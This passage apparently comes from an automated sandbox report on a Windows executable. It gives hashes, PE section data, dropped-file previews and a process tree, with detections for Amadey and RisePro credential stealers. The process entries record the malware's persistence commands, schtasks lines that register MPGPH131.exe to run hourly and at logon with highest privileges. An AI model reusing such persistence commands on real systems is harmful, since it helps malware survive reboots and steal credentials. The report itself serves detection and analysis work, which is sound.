Xbo,bTi8wc,ywOR5c,PHUIyb"
Preview:"use strict";this.default_AccountsSignInUi=this.default_AccountsSignInUi||{};(function(_){var window=this;.try{._.k("ltDFwf");.var zvb=_.y("ltDFwf");var cU=function(a){_.J.call(this,a.Ha);var b=this.oa();this.tb=this.Ra("P1ekSe");this.kb=this.Ra("cQwEuf");this.da=b.getData("progressvalue").number(0);this.ja=b.getData("buffervalue").number(1);this.Ca=b.zb("B6Vhqe");this.Ma=b.zb("juhVM");this.ta=b.zb("D6TUi");this.aa=b.zb("qdulke");this.La=0!==this.da;this.Ka=1!==this.ja;this.Ia=[];this.fa=_.Vr(this).Xb(function(){this.Ia.length&&(this.Ia.forEach(this.f9,this),this.Ia=[]);this.La&&(this.La=!1,this.tb.ob("transform","scaleX("+this.da+")"));this.Ka&&.(this.Ka=!1,this.kb.ob("transform","scaleX("+this.ja+")"));_.Tq(b,"B6Vhqe",this.Ca);_.Tq(b,"D6TUi",this.ta);_.Tq(b,"juhVM",this.Ma);_.Tq(b,"qdulke",this.aa)}).build();this.fa();_.xg&&_.Vr(this).Xb(function(){b.pb("ieri7c")}).Ce().build()();_.Hz(this.oa().el(),this.Sa.bind(this))};_.A(cU,_.J);cU.Ba=_.J.Ba;.cU.prototype.Sa=function(a,b){Avb(this
Process:C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:ASCII text, with very long lines (834)
Category:downloaded
Size (bytes):7669
Entropy (8bit):5.358621282750075
Encrypted:false
SSDEEP:192:KoBsYETJv5wkjv7JkfKNuv0DCzeBinCWBKRYaRdR2bRuRPR5RGRfRhRAR8RA:1sBXwknJrN/s2t
MD5:C342BFA66173FE4BCC024C34B5B7BCB7
SHA1:32BB20CACA08FBE056A15218A778B5DCA219134C
SHA-256:93127A8CDDC51F0FFA89579EBA1578F54CA2CF65701550E9F6A611362C79A1A9
SHA-512:F878BEE61FE8CCC5B1B279E2AF265720D26558BF5C4EC819C8A897607B6726C2156C6D4D0F621F4434E9233BB6C10843C837FDC848A3586D52B849AFD7A71FE4
Malicious:false
Reputation:unknown
URL:"https://www.gstatic.com/_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en.eIcQTVVx-II.es5.O/ck=boq-identity.AccountsSignInUi.abUGhSwZr5E.L.B1.O/am=PsAiOnEsAGLEeeADFAVCBgAAAAAAAAAArQFmBg/d=1/exm=A7fCU,AvtSve,CMcBD,E87wgc,EFQ78c,EN3i8d,Fndnac,I6YDgd,IZT63,K0PMbc,K1ZKnb,KUM7Z,L1AAkb,L9OGUe,LDQI,LEikZe,MpJwZc,NOeYWe,NTMZac,O6y8ed,PHUIyb,PrPYRd,RMhBfe,Rkm0ef,RqjULd,SCuOPb,SD8Jgb,STuCOe,SpsfSb,Tbb4sb,UUJqVe,Uas9Hd,VwDzFe,YHI3We,YTxL4,YgOFye,ZZ4WUe,ZwDk9d,_b,_tp,aC1iue,aW3pY,b3kMqb,bSspM,bTi8wc,bm51tf,byfTOb,eVCnO,f8Gu1e,hc6Ubd,iAskyc,iCBEqb,inNHtf,lsjVmc,ltDFwf,lwddkf,mvkUhe,n73qwf,nKuFpb,njlZCf,oLggrd,pxq3x,q0xTif,qPYxq,qPfo0c,qmdT9,rmumx,sOXFj,siKnQd,soHxf,t2srLd,tUnxGc,vHEMJe,vfuNJf,w9hDv,ws9Tlc,xBaz7b,xQtZb,xiZRqc,yRXbo,ywOR5c,zbML3c,ziXSP,ziZ8Mc,zr1jrb,zu7j8,zy0vNb/excm=_b,_tp,identifierview/ed=1/wt=2/ujg=1/rs=AOaEmlFktUL8CS9ma2bFQwiLvYX2iyBOiw/ee=ASJRFf:DAnQ7e;Al0B8:kibjWe;DaIJ8c:iAskyc;EVNhjf:pw70Gc;EkYFhd:NoODMc;EmZ2Bf:zr1jrb;Erl4fe:FloWmf;JsbNhc:Xd8iUd;LBgRLc:XVMNvd;Me32dd:MEeYgc;NPKaK:PVlQOd;NSEoX:lazG7b;Oj465e:KG2eXe;Pjplud:EEDORb;QGR0gd:Mlhmy;SMDL4c:K0PMbc;SNUn3:ZwDk9d;UpnZUd:nnwwYc;XdiAjb:NLiXbe;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;eBAeSb:zbML3c;iFQyKf:vfuNJf;io8t5d:yDVVkb;kMFpHd:OTA3Ae;nAFL3:NTMZac;nTuGK:JKNPM;oGtAuc:sOXFj;oSUNyd:K0PMbc;oXZmbc:tUnxGc;pXdRYb:L9OGUe;qddgKe:xQtZb;sP4Vbe:VwDzFe;uY49fb:COQbmf;ul9GGd:VDovNc;vNjB7d:YTxL4;wR5FRb:siKnQd;yxTchf:KUM7Z/m=wg1P6b"
Preview:"use strict";this.default_AccountsSignInUi=this.default_AccountsSignInUi||{};(function(_){var window=this;.try{._.qMa=_.y("wg1P6b",[_.tx,_.El,_.Kl]);._.k("wg1P6b");.var m1a=function(a,b){b=b||_.Ja;for(var c=0,d=a.length,e;c<d;){var f=c+(d-c>>>1);var h=b(0,a[f]);0<h?c=f+1:(d=f,e=!h)}return e?c:-c-1},n1a=function(a,b){for(;b=b.previousSibling;)if(b==a)return-1;return 1},o1a=function(a,b){var c=a.parentNode;if(c==b)return-1;for(;b.parentNode!=c;)b=b.parentNode;return n1a(b,a)},p1a=function(a,b){if(a==b)return 0;if(a.compareDocumentPosition)return a.compareDocumentPosition(b)&2?1:-1;if(_.xg&&!(9<=Number(_.Eg))){if(9==a.nodeType)return-1;if(9==b.nodeType)return 1}if("sourceIndex"in.a||a.parentNode&&"sourceIndex"in a.parentNode){var c=1==a.nodeType,d=1==b.nodeType;if(c&&d)return a.sourceIndex-b.sourceIndex;var e=a.parentNode,f=b.parentNode;return e==f?n1a(a,b):!c&&_.hh(e,b)?-1*o1a(a,b):!d&&_.hh(f,a)?o1a(b,a):(c?a.sourceIndex:e.sourceIndex)-(d?b.sourceIndex:f.sourceIndex)}d=_.Vg(a);c=d.create
Process:C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:ASCII text, with no line terminators
Category:downloaded
Size (bytes):52
Entropy (8bit):4.542000661265563
Encrypted:false
SSDEEP:3:yVkxzNDrMKcwVbF7KnZ:yVkxtkwVbF7KZ
MD5:B3B89B9C275343BC6798E3A83564FDDB
SHA1:32367475C527C3F5E5DB0BF42C348816FF4D157B
SHA-256:900FB968F7FD9EA55F600AC9002A89E56AB56597DA7BDE04DEAAE6CC77AEB276
SHA-512:ADB6938104E802B0936630B216CDE732F21ECA6E60E7A31D1B9C8FF52B5A66A712A7ECDE3F8ED4915D15C0A71C33A9788060E1E22999094C39020A1F8C636874
Malicious:false
Reputation:unknown
URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISHgmA6QC9dWevzxIFDRkBE_oSBQ3oIX6GEgUN05ioBw==?alt=proto
Preview:CiUKDQ0ZARP6GgQIVhgCIAEKCw3oIX6GGgQISxgCCgcN05ioBxoA
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (2362)
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):220329
                                                                                                                                                                                                                                        Entropy (8bit):5.4443770705809635
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:4btvBkNQB0w3NSOm3Rt9whvd6Ptfk/7aNyHD9KhLh:A0a0wNmBwK67cyj4hLh
                                                                                                                                                                                                                                        MD5:4441DDED9C24D3329776DD10688D12A8
                                                                                                                                                                                                                                        SHA1:07FF661EB06DDD8858DA4B7AEE259597346D4881
                                                                                                                                                                                                                                        SHA-256:58D7D9D54FF03332C13E22B4471FA7FD3834E070934CB969AE3DEBCB05DEF767
                                                                                                                                                                                                                                        SHA-512:B4F891DB471F20287A21E6482B4E3C7A9D41422DCBF5F2DC08482C61FEC6D565279CA8DA3F7ABD944B5AD226C957CB10F4395760071B3A5DD030F635F3FA5C79
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        URL:"https://www.gstatic.com/_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en.eIcQTVVx-II.es5.O/am=PsAiOnEsAGLEeeADFAVCBgAAAAAAAAAArQFmBg/d=1/excm=_b,_tp,identifierview/ed=1/dg=0/wt=2/ujg=1/rs=AOaEmlFanHGHzypIF4CDunCjsiQhMN3SxQ/m=_b,_tp"
                                                                                                                                                                                                                                        Preview:"use strict";this.default_AccountsSignInUi=this.default_AccountsSignInUi||{};(function(_){var window=this;.try{._._F_toggles_initialize=function(a){("undefined"!==typeof globalThis?globalThis:"undefined"!==typeof self?self:this)._F_toggles=a||[]};(0,_._F_toggles_initialize)([0x3a22c03e, 0x800b1c4, 0x3e079c46, 0x10814500, 0x6, 0x0, 0x201ad000, 0x199, ]);./*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/./*.. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright 2024 Google, Inc. SPDX-License-Identifier: MIT.*/./*.. Copyright 2024 Google, Inc. SPDX-License-Identifier: MIT.. Names of events that are special to jsaction. These are not all. event types that are legal to use in either HTML or the addEvent(). API, but these are the ones that are treated specially. All other. DOM events can be used in either addEvent() or in the value of the. jsaction attribute. Beware of browser specific events or events. that don't bubble though: If they are not mentioned he
                                                                                                                                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Entropy (8bit):7.944555942207053
                                                                                                                                                                                                                                        TrID:
                                                                                                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                        File name:file.exe
                                                                                                                                                                                                                                        File size:1'910'784 bytes
                                                                                                                                                                                                                                        MD5:169d873778a229bcb4f010f87930cb28
                                                                                                                                                                                                                                        SHA1:15d928181a3abe9fc84d21454246676baad444a8
                                                                                                                                                                                                                                        SHA256:f2f647ba7ca2104c8d5aa7130502eb7a48ce1ae629ee33abf1efcc07f172c449
                                                                                                                                                                                                                                        SHA512:42630f7e98502c97806a4f241598dba61298d1874bffc7baf1bea34c3950861a182daf6798f4834b4d2865238569379a3bfa796dee953224fc29e712831170c4
                                                                                                                                                                                                                                        SSDEEP:49152:13/bnTrRlJqN+zVjKQVO3LNjmd6P0uqVs:1jnTrrJqY5ORjSieG
                                                                                                                                                                                                                                        TLSH:3F95338C6F27FA65CC04727F225F5DE4AEAE11D048D9C26B050B989BCB2B72C975E074
                                                                                                                                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d.Y@...@...@....m..Q....m.......h..R....h..W....h..5....m..U....m..S...@........k..A....k1.A....k..A...Rich@...........PE..L..
                                                                                                                                                                                                                                        Icon Hash:00928e8e8686b000
                                                                                                                                                                                                                                        Entrypoint:0x8bf000
                                                                                                                                                                                                                                        Entrypoint Section:.taggant
                                                                                                                                                                                                                                        Digitally signed:false
                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                        DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                        Time Stamp:0x66264F79 [Mon Apr 22 11:52:25 2024 UTC]
                                                                                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                                                                                        OS Version Major:6
                                                                                                                                                                                                                                        OS Version Minor:0
                                                                                                                                                                                                                                        File Version Major:6
                                                                                                                                                                                                                                        File Version Minor:0
                                                                                                                                                                                                                                        Subsystem Version Major:6
                                                                                                                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                                                                                                                        Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                                                                                                                                                                                                        Instruction
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add eax, 0000000Ah
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], dh
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [edi], bh
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [edx], ah
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [ecx], al
                                                                                                                                                                                                                                        add byte ptr [eax], 00000000h
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x68056 | 0x6a | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x67000 | 0x1e0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x4bda5c | 0x10 | wqkjverv
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x4bda0c | 0x18 | wqkjverv
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
(unnamed) | 0x1000 | 0x66000 | 0x2de00 | 48612ce06c3abdffef35d7ba67cf5016 | False | 0.9904153184604905 | data | 7.923021973448171 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x67000 | 0x1e0 | 0x200 | b8e170954f2b442e0b2c8aa424296bb7 | False | 0.580078125 | data | 4.531364606348125 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x68000 | 0x1000 | 0x200 | fa73ae0289558bc65b1fbb9df747dcc7 | False | 0.1484375 | data | 1.0302962761524366 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(unnamed) | 0x69000 | 0x2b4000 | 0x200 | 3b95f3b30b02950fac7c26f7dd1b02d9 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
wqkjverv | 0x31d000 | 0x1a1000 | 0x1a0c00 | 41d1f1c5d9197b0b2b6a81472a604248 | False | 0.9948664563962207 | data | 7.95472970828884 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
wmthiooa | 0x4be000 | 0x1000 | 0x600 | 8bf2a38b8e7543f2cd5f35a89cd98db2 | False | 0.580078125 | data | 5.030197493070361 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x4bf000 | 0x3000 | 0x2200 | c71315961e1b9d7eccf17867531720c6 | False | 0.06364889705882353 | DOS executable (COM) | 0.7826917576299937 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0x4bda6c | 0x17d | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.5931758530183727

DLL | Import
kernel32.dll | lstrcpy

Language of compilation system | Country where language is spoken | Map
English | United States
Skipped network analysis since the amount of network traffic is too extensive. Please download the PCAP and check manually.


Target ID: 0
Start time: 21:33:56
Start date: 23/04/2024
Path: C:\Users\user\Desktop\file.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\file.exe"
Imagebase: 0xb40000
File size: 1'910'784 bytes
MD5 hash: 169D873778A229BCB4F010F87930CB28
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000000.00000003.1986544625.0000000005350000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000000.00000002.2026672887.0000000000B41000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation: low
Has exited: true

Target ID: 2
Start time: 21:33:59
Start date: 23/04/2024
Path: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe"
Imagebase: 0x590000
File size: 1'910'784 bytes
MD5 hash: 169D873778A229BCB4F010F87930CB28
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000002.00000002.3250378397.0000000000591000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
• Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000002.00000003.2019740253.0000000005110000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:
• Detection: 47%, ReversingLabs
Reputation: low
Has exited: false

Target ID: 3
Start time: 21:34:00
Start date: 23/04/2024
Path: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe
Imagebase: 0x590000
File size: 1'910'784 bytes
MD5 hash: 169D873778A229BCB4F010F87930CB28
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000003.00000003.2026683858.0000000005140000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000003.00000002.2067162566.0000000000591000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
Reputation: low
Has exited: true

                                                                                                                                                                                                                                        Target ID:4
                                                                                                                                                                                                                                        Start time:21:34:05
                                                                                                                                                                                                                                        Start date:23/04/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe"
                                                                                                                                                                                                                                        Imagebase:0xd0000
                                                                                                                                                                                                                                        File size:1'166'336 bytes
                                                                                                                                                                                                                                        MD5 hash:81A8F98229FF9CD694A2CB7389D22EF8
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:5
                                                                                                                                                                                                                                        Start time:21:34:05
                                                                                                                                                                                                                                        Start date:23/04/2024
                                                                                                                                                                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
                                                                                                                                                                                                                                        Imagebase:0x7ff715980000
                                                                                                                                                                                                                                        File size:3'242'272 bytes
                                                                                                                                                                                                                                        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:6
                                                                                                                                                                                                                                        Start time:21:34:06
                                                                                                                                                                                                                                        Start date:23/04/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                                                                        Imagebase:0x7ff7e52b0000
                                                                                                                                                                                                                                        File size:55'320 bytes
                                                                                                                                                                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                        Target ID:7
                                                                                                                                                                                                                                        Start time:21:34:06
                                                                                                                                                                                                                                        Start date:23/04/2024
                                                                                                                                                                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=1940,i,13936497851858077106,7979509008271672704,262144 /prefetch:8
                                                                                                                                                                                                                                        Imagebase:0x7ff715980000
                                                                                                                                                                                                                                        File size:3'242'272 bytes
                                                                                                                                                                                                                                        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:8
                                                                                                                                                                                                                                        Start time:21:34:09
                                                                                                                                                                                                                                        Start date:23/04/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe"
                                                                                                                                                                                                                                        Imagebase:0x770000
                                                                                                                                                                                                                                        File size:2'397'184 bytes
                                                                                                                                                                                                                                        MD5 hash:A5E341D76C1BE40293C678679CA9A729
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 00000008.00000002.2516925001.0000000007BDD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 00000008.00000002.2511321549.000000000149E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.2511321549.0000000001538000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:10
                                                                                                                                                                                                                                        Start time:21:34:15
                                                                                                                                                                                                                                        Start date:23/04/2024
                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
                                                                                                                                                                                                                                        Imagebase:0x8f0000
                                                                                                                                                                                                                                        File size:187'904 bytes
                                                                                                                                                                                                                                        MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:12
                                                                                                                                                                                                                                        Start time:21:34:15
                                                                                                                                                                                                                                        Start date:23/04/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:13
                                                                                                                                                                                                                                        Start time:21:34:16
                                                                                                                                                                                                                                        Start date:23/04/2024
                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
Imagebase: 0x8f0000
File size: 187'904 bytes
MD5 hash: 48C2FE20575769DE916F48EF0676A965
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 14
Start time: 21:34:16
Start date: 23/04/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6d64d0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 15
Start time: 21:34:16
Start date: 23/04/2024
Path: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe"
Imagebase: 0xd0000
File size: 1'166'336 bytes
MD5 hash: 81A8F98229FF9CD694A2CB7389D22EF8
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 16
Start time: 21:34:16
Start date: 23/04/2024
Path: C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit): false
Commandline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5612 --field-trial-handle=1940,i,13936497851858077106,7979509008271672704,262144 /prefetch:8
Imagebase: 0x7ff715980000
File size: 3'242'272 bytes
MD5 hash: 45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 17
Start time: 21:34:16
Start date: 23/04/2024
Path: C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit): false
Commandline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5584 --field-trial-handle=1940,i,13936497851858077106,7979509008271672704,262144 /prefetch:8
Imagebase: 0x7ff715980000
File size: 3'242'272 bytes
MD5 hash: 45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 18
Start time: 21:34:17
Start date: 23/04/2024
Path: C:\Program Files\Google\Chrome\Application\chrome.exe
